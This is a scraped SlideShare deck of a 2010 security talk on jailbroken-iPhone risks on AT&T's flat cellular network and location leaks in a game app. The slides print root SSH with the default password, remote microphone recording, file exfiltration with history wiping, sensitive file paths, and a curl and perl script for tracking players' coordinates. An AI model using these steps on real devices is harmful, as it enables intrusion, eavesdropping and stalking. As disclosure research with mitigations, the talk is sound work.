SlideShare a Scribd company logo

The New World of Smartphone Security

T
Trevor Hawthorn
TechnologyBusiness
1 of 110
Download to read offline
The New World of Smartphone Security What Your iPhone Disclosed About You Trevor Hawthorn Managing Partner Friday, July 9, 2010
Today’s Talk “Pockets full of shells” Friday, July 9, 2010
Today’s Talk “I can see you from my house” Friday, July 9, 2010
Who I am now Friday, July 9, 2010
Old Smartphone Best Practices = Bad = Good Friday, July 9, 2010
New Smartphone Best Practices 1. IT will use the iPhone Configuration Utility so you can talk to Exchange, use the VPN, wireless, etc. 2. Get iFart, it’s hilarious. Friday, July 9, 2010
If AT&T is in attendance: Friday, July 9, 2010
If AT&T is in attendance: • Facts about AT&T and me: Friday, July 9, 2010
If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service Friday, July 9, 2010
If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service • Feel that I have fantastic coverage everywhere I go at all times Friday, July 9, 2010
If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service • Feel that I have fantastic coverage everywhere I go at all times • Am sure you have the largest/fastest 3G network, regardless of what VZW says Friday, July 9, 2010
If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service • Feel that I have fantastic coverage everywhere I go at all times • Am sure you have the largest/fastest 3G network, regardless of what VZW says • Looking forward to years of receiving quality service from you Friday, July 9, 2010
If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service • Feel that I have fantastic coverage everywhere I go at all times • Am sure you have the largest/fastest 3G network, regardless of what VZW says • Looking forward to years of receiving quality service from you • Would love to chat Friday, July 9, 2010
Jailbreaking blackra1n pwnagetool Friday, July 9, 2010
It opens up a whole new world of applications Friday, July 9, 2010
It opens up a whole new world of applications • common Unix binaries Friday, July 9, 2010
It opens up a whole new world of applications • common Unix binaries • sshd Friday, July 9, 2010
It opens up a whole new world of applications • common Unix binaries • sshd • tethering Friday, July 9, 2010
It opens up a whole new world of applications • common Unix binaries • sshd • tethering • pirate software Friday, July 9, 2010
It opens up a whole new world of applications • common Unix binaries • sshd • tethering • pirate software • super easy to JB your phone Friday, July 9, 2010
Impact on security “Jail breaking removes 80% of the iPhone’s security precautions” Charlie Miller, SyScan 2009 Friday, July 9, 2010
How many iPhones are jailbroken? Friday, July 9, 2010
6.93% [1]http://www.slideshare.net/pinchmedia/piracy-on-the-appstore Friday, July 9, 2010
Global Stats Friday, July 9, 2010
ifconfig root# ifconfig lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384 inet 127.0.0.1 netmask 0xff000000 en0: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500 ether 00:21:e9:09:e3:4f pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450 inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff pdp_ip1: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450 pdp_ip2: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024 pdp_ip3: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024 en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500 inet 192.168.20.1 netmask 0xffffff00 broadcast 192.168.20.255 ether 0a:0b:ad:0b:ab:e0 Friday, July 9, 2010
Interfaces Friday, July 9, 2010
Interfaces en0 = 802.11 interface Friday, July 9, 2010
Interfaces en0 = 802.11 interface pdp_ip0 = primary cellular interface on APN: wap.cingular Friday, July 9, 2010
Interfaces en0 = 802.11 interface pdp_ip0 = primary cellular interface on APN: wap.cingular pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail Friday, July 9, 2010
Interfaces en0 = 802.11 interface pdp_ip0 = primary cellular interface on APN: wap.cingular pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail pdp_ip2 = not sure Friday, July 9, 2010
Interfaces en0 = 802.11 interface pdp_ip0 = primary cellular interface on APN: wap.cingular pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail pdp_ip2 = not sure pdp_ip3 = used with tethering Friday, July 9, 2010
ifconfig pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450 inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff Friday, July 9, 2010
sshd Friday, July 9, 2010
So what? Friday, July 9, 2010
Until (about) October 16, 2009 AT&T did not filter device to device IP network traffic. Friday, July 9, 2010
AT&T’s Network Most people think it looks like this: /32 Friday, July 9, 2010
AT&T’s Network Actually, more like this: Multiple /16’s Friday, July 9, 2010
Your smartphone (and laptop/ blackberry, etc.) has been on one giant flat network... Friday, July 9, 2010
So I started looking around... Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Devices On the Network 10,589* IPs scanned Count Port What? 83 22 sshd 24 80 http 4 2008 PDANet 3,644 62078 iPhone Default Friday, July 9, 2010
Other stuff out there • Saw a Linux box with sshd • Windows Mobile devices • Blackberries • Windows PC’s • PDANet for the iPhone is an open proxy. Friday, July 9, 2010
Friday, July 9, 2010
ssh access between phones Trevors-iPhone:~ root# ssh root@10.69.62.100 Password: [alpine] Nates-iPhone:~ root# Nates-iPhone:~ root# id uid=0(root) gid=0(wheel) groups=0(wheel),1 (daemon),2(kmem),3(sys),4(tty),5(operator),8 (procview),9(procmod),20(staff),29 (certusers),80(admin) Friday, July 9, 2010
Filesystem Guide Interesting stuff: /private/var/mobile/Library/Mail - Email (IMAP Exchange, POP3, etc.) , /private/var/mobile/Library/SMS - SMS Text Messages /private/var/mobile/Library/Voicemail - Voicemail in .amr format /private/var/mobile/Library/AddressBook - Contacts /private/var/mobile/Library/CallHistory - Call History /private/var/mobile/Library/Notes - Notes Friday, July 9, 2010
/private/var/mobile/Library/CallHistory/call_history.db /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb /private/var/mobile/Library/AddressBook/AddressbookImages.sqlitedb /private/var/mobile/Library/Cookies/Cookies.plist /private/var/mobile/Library/Keyboard/dynamic-text.dat /private/var/mobile/Library/Mail/Accounts.plist /private/var/mobile/Library/Mail/(mail account name)/Deleted Messages /private/var/mobile/Library/Mail/(mail account name)/Sent Messages /private/var/mobile/Library/Mail/(mail account name)/INBOX /private/var/mobile/Library/Maps/History.plist /private/var/mobile/Library/YouTube/Bookmarks.plist /private/var/mobile/Library/Voicemail/(amr files) /private/var/mobile/Library/Voicemail/voicemail.db /private/var/mobile/Library/Safari/Bookmarks.plist /private/var/mobile/Library/Safari/History.plist /private/var/mobile/Library/Suspend.plist /private/var/mobile/Library/Safari/SuspendState.plist /private/var/mobile/Library/Safari/SMS/sms.db /private/var/mobile/Library/Preference/(various preference Plists) /private/var/mobile/Library/Notes/notes.db Friday, July 9, 2010
Let’s do a bit more Erica Utilities - cmd line utilities for the iPhone recAudio: Record audio from the recAudio onboard microphone. Queries the iPhone’s GPS API to findme return latitude/longitude Friday, July 9, 2010
Attacker Victim recAudio scp/ssh recording.aiff 10.69.62.220 10.69.62.100 Friday, July 9, 2010
I can hear you typing Trevors-iPhone:~ root# scp bin/recAudio root@10.69.62.100: Password: recAudio 100% 19KB 1.3KB/s 00:00 Trevors-iPhone:~ root# ssh root@10.69.62.100 Password: Nates-iPhone:~ root# ./recAudio Start talking. Press ^C to finish. Starting recording ^C Interrupted. Stopping recording Friday, July 9, 2010
Nates-iPhone:~ root# ls -l *.aiff -rw-r--r-- 1 root wheel 43178 Oct 2 22:35 2009-10-92 at 22:35:04.aiff Nates-iPhone:~ root# mv 2009-10-92 at 22:35:04.aiff test.aiff Trevors-iPhone: root# scp root@10.69.62.100:~/*.aiff . Password: test.aiff 100% 523KB 2.2KB/ s 00:00 Nates-iPhone:~ root# rm test.aiff recAudio .bash_history Nates-iPhone:~ root# last wtmp begins at Fri Oct 2 22:41 Nates-iPhone:~ root# Friday, July 9, 2010
Other bad things Friday, July 9, 2010
Other bad things • ./openURL tel://1-900-XXX-XXX Friday, July 9, 2010
Other bad things • ./openURL tel://1-900-XXX-XXX • ./openURL tel://911 or tel://mynumber Friday, July 9, 2010
Other bad things • ./openURL tel://1-900-XXX-XXX • ./openURL tel://911 or tel://mynumber • Pillage filesystem: email, sms, notes, app data, etc. Friday, July 9, 2010
Other bad things • ./openURL tel://1-900-XXX-XXX • ./openURL tel://911 or tel://mynumber • Pillage filesystem: email, sms, notes, app data, etc. • apt-get install tcpdump nmap Friday, July 9, 2010
Other bad things • ./openURL tel://1-900-XXX-XXX • ./openURL tel://911 or tel://mynumber • Pillage filesystem: email, sms, notes, app data, etc. • apt-get install tcpdump nmap • go wild on whatever network en0 is connected to. Friday, July 9, 2010
Worms and Exploits Friday, July 9, 2010
Dutch Extortion November 2009 Friday, July 9, 2010
ikee Worm November 2009 Friday, July 9, 2010
Exploits • Phone/Privacy.A* command line tool • Phone/iBotNet.A* worm with C&C *Discovered by security firm Intego Friday, July 9, 2010
Some good news Friday, July 9, 2010
Some good news • AT&T does segment part of their network: Friday, July 9, 2010
Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC Friday, July 9, 2010
Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston Friday, July 9, 2010
Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston • No easy way to target specific individual (Identity to AT&T NAT IP address not super easy) Friday, July 9, 2010
Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston • No easy way to target specific individual (Identity to AT&T NAT IP address not super easy) • No way to correlate 10.x.x.x IP to person via Safari Friday, July 9, 2010
Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston • No easy way to target specific individual (Identity to AT&T NAT IP address not super easy) • No way to correlate 10.x.x.x IP to person via Safari • decloak.net doesn’t really work in Mobile Safari Friday, July 9, 2010
Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston • No easy way to target specific individual (Identity to AT&T NAT IP address not super easy) • No way to correlate 10.x.x.x IP to person via Safari • decloak.net doesn’t really work in Mobile Safari • Man this is slow... Friday, July 9, 2010
email to ID user <img src=”http://10.69.62.220/i.jpg”> 10.69.63.220:80 10.69.63.110 src:10.69.63.110 10.69.63.220:80 10.69.63.110 dst:10.69.63.220 Friday, July 9, 2010
What to do • Don’t Jailbreak your phone if you care about security (sorry) • Change root and mobile users’ passwords • Attention Cydia Folks: Do not bind sshd to pdp interfaces; force password change upon install • IT Folks: Policy on jailbroken iphones • AT&T: Filter mobile to mobile IP traffic Friday, July 9, 2010
Privacy and Location Based Apps Friday, July 9, 2010
Location Based Apps Friday, July 9, 2010
Location Based Apps • Underworld: Sweet Deal Friday, July 9, 2010
Location Based Apps • Underworld: Sweet Deal • Drug trafficking game with candy Friday, July 9, 2010
Location Based Apps • Underworld: Sweet Deal • Drug trafficking game with candy • Location matters, move product from point A to point B Friday, July 9, 2010
Location Based Apps • Underworld: Sweet Deal • Drug trafficking game with candy • Location matters, move product from point A to point B • Phone sends high resolution coordinates to game server Friday, July 9, 2010
Like Druglords Friday, July 9, 2010
Underworld: Sweetdeal Friday, July 9, 2010
Google Maps Friday, July 9, 2010
Paros • Client side proxy • Configure iPhone to use machine running Paros’s IP address as proxy • Watch what your apps send and receive Friday, July 9, 2010
Request Friday, July 9, 2010
Response Friday, July 9, 2010
Used to monitor players Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Let’s pick a non-intel agency player chezk Friday, July 9, 2010
Request Friday, July 9, 2010
Response Friday, July 9, 2010
Lat/Lon to GMaps: Friday, July 9, 2010
County Records Friday, July 9, 2010
Facebook Friday, July 9, 2010
Ok neat, what else? Friday, July 9, 2010
Near real-time geolocation tracking of players Friday, July 9, 2010
cURL + perl + crontab = csv + gpsbabel = kml + Google Earth = EPIC screen shots Friday, July 9, 2010
curl script #/bin/sh # # First login... # curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/ 10.0.0d3" -d @/home/trevor/iphone/login.xml --dump-header /home/ trevor/iphone/headers.txt http://game.dl.a-steroids.com/TrafficServer/ # # Then update location curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/ 10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/ update_loc.xml http://game.dl.a-steroids.com/TrafficServer/ # # Get GMap obhjects curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/ 10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/ gmap_update.xml http://game.dl.a-steroids.com/TrafficServer/ Friday, July 9, 2010
perl script #! /usr/bin/perl use strict; use warnings; # make single or multiline input into one scalar my $glob = join('',(<>)); # extract name-to-flag records my @records = $glob =~ /(<name>.*?</lon>)/ig; for (@records) { my ($name,$lat,$lon) = $_ =~ qr|<name>(.*?)</name>.*?<lat>([-d.]*)</lat><lon>([-d .]*)</lon>|i; print "$lat,$lon,$namen"; } Friday, July 9, 2010
perl script output 39.93220206723633,-77.47186584472656,poppyseed 38.13753356933594,-77.06847380591797,Gadsden 39.98429718017578,-78.30014190673828,Ziggety 39.23520812988281,-77.40483581542969,Lexi 39.855418395996094,-77.2717056274414,Tatu 39.55705801582031,-77.4004086303711,Bigfoot 36.67790985107422,-77.5902328491211,Jeneko 38.297552490234375,-77.65829467773438,Stilbored 39.891050720214844,-77.55879211025781,Timoteo 39.66313247680664,-78.04374694824219,Gamber 36.295310314697266,-78.14061126700984,UnderWear Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Comments/Feedback: trevor.hawthorn@stratumsecurity.com www.stratumsecurity.com Twitter: @packetwerks @stratumsecurity Special Thanks: Tiago Stock Friday, July 9, 2010

Recommended

MVC Demystified: Essence of Ruby on Rails
MVC Demystified: Essence of Ruby on RailsMVC Demystified: Essence of Ruby on Rails
MVC Demystified: Essence of Ruby on Railscodeinmotion
 
Train Lighting System Seminor Presentation
Train Lighting System Seminor PresentationTrain Lighting System Seminor Presentation
Train Lighting System Seminor PresentationAkhil S
 
Remote accident report system for highways using rf
Remote accident report system for highways using rfRemote accident report system for highways using rf
Remote accident report system for highways using rfPRADEEP Cheekatla
 
Seminar ppt on digital signature
Seminar ppt on digital signatureSeminar ppt on digital signature
Seminar ppt on digital signaturejolly9293
 
Mobile Web and Campus Assistant
Mobile Web and Campus AssistantMobile Web and Campus Assistant
Mobile Web and Campus Assistantshellac
 
Craig Rispin Keynote at Sentis Neurosafety Summit 2013
Craig Rispin Keynote at Sentis Neurosafety Summit 2013Craig Rispin Keynote at Sentis Neurosafety Summit 2013
Craig Rispin Keynote at Sentis Neurosafety Summit 2013Craig Rispin
 
Roomware - Trends - Hardware as commodity
Roomware - Trends - Hardware as commodityRoomware - Trends - Hardware as commodity
Roomware - Trends - Hardware as commodityguest8ce14f
 
Room ware next_slideshare
Room ware next_slideshareRoom ware next_slideshare
Room ware next_slidesharePeter Kaptein
 

Recommended

MVC Demystified: Essence of Ruby on Rails
MVC Demystified: Essence of Ruby on RailsMVC Demystified: Essence of Ruby on Rails
MVC Demystified: Essence of Ruby on Railscodeinmotion
 
Train Lighting System Seminor Presentation
Train Lighting System Seminor PresentationTrain Lighting System Seminor Presentation
Train Lighting System Seminor PresentationAkhil S
 
Remote accident report system for highways using rf
Remote accident report system for highways using rfRemote accident report system for highways using rf
Remote accident report system for highways using rfPRADEEP Cheekatla
 
Seminar ppt on digital signature
Seminar ppt on digital signatureSeminar ppt on digital signature
Seminar ppt on digital signaturejolly9293
 
Mobile Web and Campus Assistant
Mobile Web and Campus AssistantMobile Web and Campus Assistant
Mobile Web and Campus Assistantshellac
 
Craig Rispin Keynote at Sentis Neurosafety Summit 2013
Craig Rispin Keynote at Sentis Neurosafety Summit 2013Craig Rispin Keynote at Sentis Neurosafety Summit 2013
Craig Rispin Keynote at Sentis Neurosafety Summit 2013Craig Rispin
 
Roomware - Trends - Hardware as commodity
Roomware - Trends - Hardware as commodityRoomware - Trends - Hardware as commodity
Roomware - Trends - Hardware as commodityguest8ce14f
 
Room ware next_slideshare
Room ware next_slideshareRoom ware next_slideshare
Room ware next_slidesharePeter Kaptein
 
Snac - PluggedIn NYC011210
Snac - PluggedIn NYC011210Snac - PluggedIn NYC011210
Snac - PluggedIn NYC011210PluggedIn
 
Phone gap nikolaionken-08-06
Phone gap nikolaionken-08-06Phone gap nikolaionken-08-06
Phone gap nikolaionken-08-06Skills Matter
 
Mobile is Everyware
Mobile is EverywareMobile is Everyware
Mobile is EverywarePaul Golding
 
OSMC2010 Open NMS Kickstart
OSMC2010 Open NMS KickstartOSMC2010 Open NMS Kickstart
OSMC2010 Open NMS KickstartRonny
 
Creating New Interaction with the iPhone, Daniel Heffernan, Appschool
Creating New Interaction with the iPhone, Daniel Heffernan, AppschoolCreating New Interaction with the iPhone, Daniel Heffernan, Appschool
Creating New Interaction with the iPhone, Daniel Heffernan, Appschoolcatherinewall
 
Uniting care hospital of the future - craig rispin
Uniting care hospital of the future - craig rispinUniting care hospital of the future - craig rispin
Uniting care hospital of the future - craig rispinCraig Rispin
 
Mobile Monday Atlanta Aug10 2009
Mobile Monday Atlanta Aug10 2009Mobile Monday Atlanta Aug10 2009
Mobile Monday Atlanta Aug10 2009momocamp
 
Advanced android
Advanced androidAdvanced android
Advanced androiddonnfelker
 
Mobile Strategy & Product Dev. - iRush
Mobile Strategy & Product Dev. - iRushMobile Strategy & Product Dev. - iRush
Mobile Strategy & Product Dev. - iRushAndrew Donoho
 
OpenStack Summit, A Community of Service Providers
OpenStack Summit, A Community of Service ProvidersOpenStack Summit, A Community of Service Providers
OpenStack Summit, A Community of Service ProvidersAndrew Shafer
 
Alan Srbljanin NextGen 09
Alan Srbljanin NextGen 09Alan Srbljanin NextGen 09
Alan Srbljanin NextGen 09Marit Hendriks
 
T-DOSE 2010 - Agile Enterprise, CLouds and Devops
T-DOSE 2010 - Agile Enterprise, CLouds and DevopsT-DOSE 2010 - Agile Enterprise, CLouds and Devops
T-DOSE 2010 - Agile Enterprise, CLouds and DevopsChef Software, Inc.
 
The Mobile Experience Ecosystem - Towards Personal Mobile Information Archite...
The Mobile Experience Ecosystem - Towards Personal Mobile Information Archite...The Mobile Experience Ecosystem - Towards Personal Mobile Information Archite...
The Mobile Experience Ecosystem - Towards Personal Mobile Information Archite...Rod Farmer
 
iPhone Apps - What, how, why?
iPhone Apps - What, how, why?iPhone Apps - What, how, why?
iPhone Apps - What, how, why?David Carr
 
GTEC: Government as a Platform
GTEC: Government as a PlatformGTEC: Government as a Platform
GTEC: Government as a PlatformTim O'Reilly
 
Mobile IA Talk for Oz-IA 2009
Mobile IA Talk for Oz-IA 2009Mobile IA Talk for Oz-IA 2009
Mobile IA Talk for Oz-IA 2009Oliver Weidlich
 
Beyond 3G: Bringing Networks, Terminals and the Web Together
Beyond 3G: Bringing Networks, Terminals and the Web TogetherBeyond 3G: Bringing Networks, Terminals and the Web Together
Beyond 3G: Bringing Networks, Terminals and the Web TogetherMobileMonday Norway
 
Look back
Look backLook back
Look backRamesh Kumar
 
Innovation Challenges in the Wireless Broadband Eco-System
Innovation Challenges in the Wireless Broadband Eco-System Innovation Challenges in the Wireless Broadband Eco-System
Innovation Challenges in the Wireless Broadband Eco-System Dr. Mazlan Abbas
 
The Megatrend of M2M - a View of the Year 2018 - Craig Rispin Keynote at - C...
The Megatrend of M2M - a View of the Year 2018 - Craig Rispin Keynote at - C...The Megatrend of M2M - a View of the Year 2018 - Craig Rispin Keynote at - C...
The Megatrend of M2M - a View of the Year 2018 - Craig Rispin Keynote at - C...Craig Rispin
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 

More Related Content

Similar to The New World of Smartphone Security

Snac - PluggedIn NYC011210
Snac - PluggedIn NYC011210Snac - PluggedIn NYC011210
Snac - PluggedIn NYC011210PluggedIn
 
Phone gap nikolaionken-08-06
Phone gap nikolaionken-08-06Phone gap nikolaionken-08-06
Phone gap nikolaionken-08-06Skills Matter
 
Mobile is Everyware
Mobile is EverywareMobile is Everyware
Mobile is EverywarePaul Golding
 
OSMC2010 Open NMS Kickstart
OSMC2010 Open NMS KickstartOSMC2010 Open NMS Kickstart
OSMC2010 Open NMS KickstartRonny
 
Creating New Interaction with the iPhone, Daniel Heffernan, Appschool
Creating New Interaction with the iPhone, Daniel Heffernan, AppschoolCreating New Interaction with the iPhone, Daniel Heffernan, Appschool
Creating New Interaction with the iPhone, Daniel Heffernan, Appschoolcatherinewall
 
Uniting care hospital of the future - craig rispin
Uniting care hospital of the future - craig rispinUniting care hospital of the future - craig rispin
Uniting care hospital of the future - craig rispinCraig Rispin
 
Mobile Monday Atlanta Aug10 2009
Mobile Monday Atlanta Aug10 2009Mobile Monday Atlanta Aug10 2009
Mobile Monday Atlanta Aug10 2009momocamp
 
Advanced android
Advanced androidAdvanced android
Advanced androiddonnfelker
 
Mobile Strategy & Product Dev. - iRush
Mobile Strategy & Product Dev. - iRushMobile Strategy & Product Dev. - iRush
Mobile Strategy & Product Dev. - iRushAndrew Donoho
 
OpenStack Summit, A Community of Service Providers
OpenStack Summit, A Community of Service ProvidersOpenStack Summit, A Community of Service Providers
OpenStack Summit, A Community of Service ProvidersAndrew Shafer
 
Alan Srbljanin NextGen 09
Alan Srbljanin NextGen 09Alan Srbljanin NextGen 09
Alan Srbljanin NextGen 09Marit Hendriks
 
T-DOSE 2010 - Agile Enterprise, CLouds and Devops
T-DOSE 2010 - Agile Enterprise, CLouds and DevopsT-DOSE 2010 - Agile Enterprise, CLouds and Devops
T-DOSE 2010 - Agile Enterprise, CLouds and DevopsChef Software, Inc.
 
The Mobile Experience Ecosystem - Towards Personal Mobile Information Archite...
The Mobile Experience Ecosystem - Towards Personal Mobile Information Archite...The Mobile Experience Ecosystem - Towards Personal Mobile Information Archite...
The Mobile Experience Ecosystem - Towards Personal Mobile Information Archite...Rod Farmer
 
iPhone Apps - What, how, why?
iPhone Apps - What, how, why?iPhone Apps - What, how, why?
iPhone Apps - What, how, why?David Carr
 
GTEC: Government as a Platform
GTEC: Government as a PlatformGTEC: Government as a Platform
GTEC: Government as a PlatformTim O'Reilly
 
Mobile IA Talk for Oz-IA 2009
Mobile IA Talk for Oz-IA 2009Mobile IA Talk for Oz-IA 2009
Mobile IA Talk for Oz-IA 2009Oliver Weidlich
 
Beyond 3G: Bringing Networks, Terminals and the Web Together
Beyond 3G: Bringing Networks, Terminals and the Web TogetherBeyond 3G: Bringing Networks, Terminals and the Web Together
Beyond 3G: Bringing Networks, Terminals and the Web TogetherMobileMonday Norway
 
Innovation Challenges in the Wireless Broadband Eco-System
Innovation Challenges in the Wireless Broadband Eco-System Innovation Challenges in the Wireless Broadband Eco-System
Innovation Challenges in the Wireless Broadband Eco-System Dr. Mazlan Abbas
 
The Megatrend of M2M - a View of the Year 2018 - Craig Rispin Keynote at - C...
The Megatrend of M2M - a View of the Year 2018 - Craig Rispin Keynote at - C...The Megatrend of M2M - a View of the Year 2018 - Craig Rispin Keynote at - C...
The Megatrend of M2M - a View of the Year 2018 - Craig Rispin Keynote at - C...Craig Rispin
 

Similar to The New World of Smartphone Security (20)

Snac - PluggedIn NYC011210
Snac - PluggedIn NYC011210Snac - PluggedIn NYC011210
Snac - PluggedIn NYC011210
 
Phone gap nikolaionken-08-06
Phone gap nikolaionken-08-06Phone gap nikolaionken-08-06
Phone gap nikolaionken-08-06
 
Mobile is Everyware
Mobile is EverywareMobile is Everyware
Mobile is Everyware
 
OSMC2010 Open NMS Kickstart
OSMC2010 Open NMS KickstartOSMC2010 Open NMS Kickstart
OSMC2010 Open NMS Kickstart
 
Creating New Interaction with the iPhone, Daniel Heffernan, Appschool
Creating New Interaction with the iPhone, Daniel Heffernan, AppschoolCreating New Interaction with the iPhone, Daniel Heffernan, Appschool
Creating New Interaction with the iPhone, Daniel Heffernan, Appschool
 
Uniting care hospital of the future - craig rispin
Uniting care hospital of the future - craig rispinUniting care hospital of the future - craig rispin
Uniting care hospital of the future - craig rispin
 
Mobile Monday Atlanta Aug10 2009
Mobile Monday Atlanta Aug10 2009Mobile Monday Atlanta Aug10 2009
Mobile Monday Atlanta Aug10 2009
 
Advanced android
Advanced androidAdvanced android
Advanced android
 
Mobile Strategy & Product Dev. - iRush
Mobile Strategy & Product Dev. - iRushMobile Strategy & Product Dev. - iRush
Mobile Strategy & Product Dev. - iRush
 
OpenStack Summit, A Community of Service Providers
OpenStack Summit, A Community of Service ProvidersOpenStack Summit, A Community of Service Providers
OpenStack Summit, A Community of Service Providers
 
Alan Srbljanin NextGen 09
Alan Srbljanin NextGen 09Alan Srbljanin NextGen 09
Alan Srbljanin NextGen 09
 
T-DOSE 2010 - Agile Enterprise, CLouds and Devops
T-DOSE 2010 - Agile Enterprise, CLouds and DevopsT-DOSE 2010 - Agile Enterprise, CLouds and Devops
T-DOSE 2010 - Agile Enterprise, CLouds and Devops
 
The Mobile Experience Ecosystem - Towards Personal Mobile Information Archite...
The Mobile Experience Ecosystem - Towards Personal Mobile Information Archite...The Mobile Experience Ecosystem - Towards Personal Mobile Information Archite...
The Mobile Experience Ecosystem - Towards Personal Mobile Information Archite...
 
iPhone Apps - What, how, why?
iPhone Apps - What, how, why?iPhone Apps - What, how, why?
iPhone Apps - What, how, why?
 
GTEC: Government as a Platform
GTEC: Government as a PlatformGTEC: Government as a Platform
GTEC: Government as a Platform
 
Mobile IA Talk for Oz-IA 2009
Mobile IA Talk for Oz-IA 2009Mobile IA Talk for Oz-IA 2009
Mobile IA Talk for Oz-IA 2009
 
Beyond 3G: Bringing Networks, Terminals and the Web Together
Beyond 3G: Bringing Networks, Terminals and the Web TogetherBeyond 3G: Bringing Networks, Terminals and the Web Together
Beyond 3G: Bringing Networks, Terminals and the Web Together
 
Look back
Look backLook back
Look back
 
Innovation Challenges in the Wireless Broadband Eco-System
Innovation Challenges in the Wireless Broadband Eco-System Innovation Challenges in the Wireless Broadband Eco-System
Innovation Challenges in the Wireless Broadband Eco-System
 
The Megatrend of M2M - a View of the Year 2018 - Craig Rispin Keynote at - C...
The Megatrend of M2M - a View of the Year 2018 - Craig Rispin Keynote at - C...The Megatrend of M2M - a View of the Year 2018 - Craig Rispin Keynote at - C...
The Megatrend of M2M - a View of the Year 2018 - Craig Rispin Keynote at - C...
 

Recently uploaded

08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
